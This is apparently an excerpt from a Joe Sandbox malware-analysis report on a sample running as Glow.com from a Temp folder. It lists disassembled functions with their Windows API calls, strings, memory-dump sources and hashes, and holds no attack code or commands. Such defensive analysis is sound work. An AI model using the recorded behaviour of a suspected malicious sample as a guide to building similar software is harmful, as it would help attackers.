Function 003B1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\600044\Glow.com,00000104), ref: 003B1AD9
_free.LIBCMT ref: 003B1BA4
_free.LIBCMT ref: 003B1BAE

Strings

C:\Users\user\AppData\Local\Temp\600044\Glow.com, xrefs: 003B1AD0, 003B1AD7, 003B1B06, 003B1B3E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\600044\Glow.com
API String ID: 2506810119-3012505560
Opcode ID: 2c4810831764f1e7bccf5a311fb46ba9d7f163bb5838fac18f54e855ad80730f
Instruction ID: 04b2660fca66c2fc16618d594db3a6224892f6d663b2bf63ee2db269ee2fc688
Opcode Fuzzy Hash: 2c4810831764f1e7bccf5a311fb46ba9d7f163bb5838fac18f54e855ad80730f
Instruction Fuzzy Hash: CF318371A00218AFCB22DB99CC91DDFBBBCEB85714B5141A6F9049B611E7B09E40C790

Function 003ECB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003ECBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 003ECBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004529C0,01395910), ref: 003ECC40

Strings

0, xrefs: 003ECB8A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 02bb8fab855071beac885a789d1872d9fecd9bb80314c645f7aa1e4b282fc47a
Instruction ID: d3c0501864bffdf7c0bef2c2957db71922b7ab9f78be35852749df74d50d3057
Opcode Fuzzy Hash: 02bb8fab855071beac885a789d1872d9fecd9bb80314c645f7aa1e4b282fc47a
Instruction Fuzzy Hash: C041D0712143929FD722DF25C884B5EBBE8AF84B20F14461DF4A59B2D1C730A906CB52

Function 00414EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041DCD0,00000000,?,?,?,?), ref: 00414F48
GetWindowLongW.USER32 ref: 00414F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00414F75

Strings

SysTreeView32, xrefs: 00414F1A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a84da7f01d1c40c87ce9ef104c8df9d479162c733327903846d1ccf7c3b347fa
Instruction ID: ce2bd8384f838928463639da3e7b33c2d84ee29684c8cd3f402ab0987dd76763
Opcode Fuzzy Hash: a84da7f01d1c40c87ce9ef104c8df9d479162c733327903846d1ccf7c3b347fa
Instruction Fuzzy Hash: 3531AF71604205AFDB219E78CC45BDB77A9EB48334F204726F979A22E0C778EC919758

Function 00403AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00403AD4,?,?), ref: 00403DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00403AD7
_wcslen.LIBCMT ref: 00403AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00403B63

Strings

255.255.255.255, xrefs: 00403AF2, 00403AF7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 654e3a8e96ce3fd56f0a3c7d91a8bdb4a64e7c3bce875e02a78eeaab27d1ddc2
Instruction ID: d4cf06aee8d3f90ace252ecbedfa888c33064ea12016f18f267bd7704df006f6
Opcode Fuzzy Hash: 654e3a8e96ce3fd56f0a3c7d91a8bdb4a64e7c3bce875e02a78eeaab27d1ddc2
Instruction Fuzzy Hash: 4231B2396002019FCB10DF68C485EAA7BF8EF14319F24816AE8169B3D3D739EE46C764

Function 00414954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004149DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004149F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00414A14

Strings

SysMonthCal32, xrefs: 004149A7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9c7cde0dece73e059c5148daa096c4bf7f7aa63cabc08de533924665457f0e04
Instruction ID: 42d73c52eea83ad18483a8267e3250f960052fb526c7e9951818502d39134329
Opcode Fuzzy Hash: 9c7cde0dece73e059c5148daa096c4bf7f7aa63cabc08de533924665457f0e04
Instruction Fuzzy Hash: 4C21F172610219BBDF118FA0CC42FEF3B69EF88728F110215FA156B1D0D6B5E891CB94

Function 004150F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004151A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004151B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004151B8

Strings

msctls_updown32, xrefs: 00415122

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 8819058a6156422d813aa557cbd650a015a8be90e4671f8ac08b4c1cab595ed8
Instruction ID: d5d16722ecb1ba338ef3687d003e3dbc602ac1b902d4aca6daddafbc9747a0fa
Opcode Fuzzy Hash: 8819058a6156422d813aa557cbd650a015a8be90e4671f8ac08b4c1cab595ed8
Instruction Fuzzy Hash: A9214FB5A00609BFDB11DF54CC81EE737ADEB9A364B14015AF9009B361CA74EC51CBA4

Function 00414253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004142DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004142EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00414312

Strings

Listbox, xrefs: 004142AB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a0c9d7f18d7cf7d0cf65d76589af8d4086ab08cafb472a7d8ddabc9e1abd882d
Instruction ID: a9161489c995da7e455ec94ec42c325b7f0fd8a71f86ba7c33df65a0ad6e4862
Opcode Fuzzy Hash: a0c9d7f18d7cf7d0cf65d76589af8d4086ab08cafb472a7d8ddabc9e1abd882d
Instruction Fuzzy Hash: 6C21B032600218BBEB118F94CC85FEB376EEBC97A4F118125F9149B290C6759C9287A4

Function 003F5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003F544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003F54A1
SetErrorMode.KERNEL32(00000000,?,?,0041DCD0), ref: 003F5515

Strings

%lu, xrefs: 003F54B4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: faf89eee9570c5a6f29dc6aac4cf5c5e2e26932becfe0373cea11bdf553eaabc
Instruction ID: b5a7debc1e9f35bd3a9adcb5428a84be347a02c0dbf45d9c2539e0509ca42ec1
Opcode Fuzzy Hash: faf89eee9570c5a6f29dc6aac4cf5c5e2e26932becfe0373cea11bdf553eaabc
Instruction Fuzzy Hash: E1318271A00209AFDB11EF54C885EAAB7F8EF05304F1580A9F509DF262DB71EE45CB61

Function 00418305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00418339
EnumChildWindows.USER32(?,0041802F,00000000), ref: 004183B0

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

Strings

(E, xrefs: 00418317
(E, xrefs: 0041834A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: (E$(E
API String ID: 3814560230-3237547482
Opcode ID: 1b64f0178dd6476ec7f330df080bd0985d6b82a69787b61b5b31fb85869c42f6
Instruction ID: ce5561989f59138debed0b978d56c037fb24a4a9de8473d8d1224f070b781856
Opcode Fuzzy Hash: 1b64f0178dd6476ec7f330df080bd0985d6b82a69787b61b5b31fb85869c42f6
Instruction Fuzzy Hash: 5B217AB5200705CFC720DF28D840A96B7E5FB4A721F24072EE875C73A1DBB1A840CBA8

Function 00414C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00414CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00414D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00414D0F

Strings

msctls_trackbar32, xrefs: 00414CC4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: bdd70cf0244c6d2d559249bfde4fc5f62ae14b066b0e7223310df6120a2fa846
Instruction ID: 495a3e67a67b9d5a8bc3fdb3b539548e0a4ad7d36aff1bda902ab63c9e18fd82
Opcode Fuzzy Hash: bdd70cf0244c6d2d559249bfde4fc5f62ae14b066b0e7223310df6120a2fa846
Instruction Fuzzy Hash: D7113671240208BEEF205F65DC06FEB37A8EFC5B64F11012AFA50E21A0D275DC91DB58

Function 003E389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

Part of subcall function 003E36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E3712
Part of subcall function 003E36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3723
Part of subcall function 003E36F4: GetCurrentThreadId.KERNEL32 ref: 003E372A
Part of subcall function 003E36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E3731

GetFocus.USER32 ref: 003E38C4

Part of subcall function 003E373B: GetParent.USER32(00000000), ref: 003E3746

GetClassNameW.USER32(?,?,00000100), ref: 003E390F
EnumChildWindows.USER32(?,003E3987), ref: 003E3937

Strings

%s%d, xrefs: 003E394B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 6f1d9104505ec5fc0a5a79ad83f1b452defd748bd1b147146d7cd577a77d8cb6
Instruction ID: 7c5f0be3c65a826e4ec38174d66596bf030401bf1047ad79679e76d5644f7185
Opcode Fuzzy Hash: 6f1d9104505ec5fc0a5a79ad83f1b452defd748bd1b147146d7cd577a77d8cb6
Instruction Fuzzy Hash: 7611D2B5A002556BCF12BF758C89BED77AAAF94300F008079B9099F293DF7099058B20

Function 003859FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00385A34
DestroyWindow.USER32(?,003837B8,?,?,?,?,?,00383709,?,?), ref: 00385A91

Strings

<)E, xrefs: 003C4F34
<)E, xrefs: 00385A09

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)E$<)E
API String ID: 2587070983-47095286
Opcode ID: a63a8677faa60ca10d0803dbf40ac42ac912d0170b996d69fe4d8948d81086f1
Instruction ID: 149f87ecb6b54d1d5d4d6d97641ba6d82cdf278979b3293879703bf8e2b6ca12
Opcode Fuzzy Hash: a63a8677faa60ca10d0803dbf40ac42ac912d0170b996d69fe4d8948d81086f1
Instruction Fuzzy Hash: F22130B1306B01CFDB1BAB15EA94B2537E5B746312F0541AEE8019B372CBB8DC44CB48

Function 00416321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00416360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0041638D
DrawMenuBar.USER32(?), ref: 0041639C

Strings

0, xrefs: 0041632E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 3d64c2b97732c73b64032ca8aa33cd82941628aa05dc4aa95c492b98224ddaa0
Instruction ID: c2b7461bf09176f050887bd191720abac4f389718842531f99e4740027afab04
Opcode Fuzzy Hash: 3d64c2b97732c73b64032ca8aa33cd82941628aa05dc4aa95c492b98224ddaa0
Instruction Fuzzy Hash: BE018071600218EFDB119F11DC84BEE7BB5FF45351F10C09AE84ADA250DB348A85EF25

Function 0041823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,004528E0,0041AD55,000000FC,?,00000000,00000000,?), ref: 0041823F
GetFocus.USER32 ref: 00418247

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 004182B4

Strings

(E, xrefs: 00418254

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (E
API String ID: 3601265619-3218771753
Opcode ID: 220b034afc7f5cbaf208c17765c00547c573d14aee17fe5689af01078fe77b37
Instruction ID: 3f2dce8d71998f58e5216b93b58873f7114bc1d18bf2a65d689df57fc5140432
Opcode Fuzzy Hash: 220b034afc7f5cbaf208c17765c00547c573d14aee17fe5689af01078fe77b37
Instruction Fuzzy Hash: F9017575602A00CFC316DF68D854AA637E6EFCA321F1442AEE416873B1CB35AC47CB58

Function 00418526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00418576
CreateAcceleratorTableW.USER32(00000000,?,?,?,003FBE96,00000000,00000000,?,00000001,00000002), ref: 0041858C
GetForegroundWindow.USER32(?,003FBE96,00000000,00000000,?,00000001,00000002), ref: 00418595

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

Strings

(E, xrefs: 00418532

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (E
API String ID: 986409557-3218771753
Opcode ID: 719731c95a6b70c7df8bd36e25289f9d4a729f5d3712ec9764d7b8e88a920d7c
Instruction ID: edfbd86f3b845d51539e4e50f2c0a2257b5517ab002a60abad047bfefa503bad
Opcode Fuzzy Hash: 719731c95a6b70c7df8bd36e25289f9d4a729f5d3712ec9764d7b8e88a920d7c
Instruction Fuzzy Hash: D0015B71601704EFCB249F69D984AA637B2FB05322F10852FE515863B1DB74E890CB88

Function 00418BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00454038,0045407C), ref: 00418C1A
CloseHandle.KERNEL32 ref: 00418C2C

Strings

|@E, xrefs: 00418BE5
8@E, xrefs: 00418BD6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@E$|@E
API String ID: 3712363035-501201497
Opcode ID: 0ac6d4b37962fcd0a476dbab27c244d56bf097d520beaaf46ddc31d53d04b85f
Instruction ID: be7425853d813a0b969f72326998c4ca7272f93f96fd388e718511bf352b75f1
Opcode Fuzzy Hash: 0ac6d4b37962fcd0a476dbab27c244d56bf097d520beaaf46ddc31d53d04b85f
Instruction Fuzzy Hash: 82F030B2541314BAE3106B646C45FB73A6CEB45B56F104031BF09D91E2D6658844C2AD

Function 003DE778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003DE797
FreeLibrary.KERNEL32 ref: 003DE7BD

Strings

X64, xrefs: 003DE680
GetSystemWow64DirectoryW, xrefs: 003DE791

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 13bed45638b7d21f0193cc8c472bce6cc85c4ba1283ed0888732f7ca5373ffec
Instruction ID: f73329cc38ec8e9954295a58be74fd7b3c7c229c59e3aa70ccd2bfc2a1ad5eaf
Opcode Fuzzy Hash: 13bed45638b7d21f0193cc8c472bce6cc85c4ba1283ed0888732f7ca5373ffec
Instruction Fuzzy Hash: 14E02BB3C02521AFE77766205C84FE936187F10701B2645AFFC06FA244DB28CC84865C

Function 003E096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
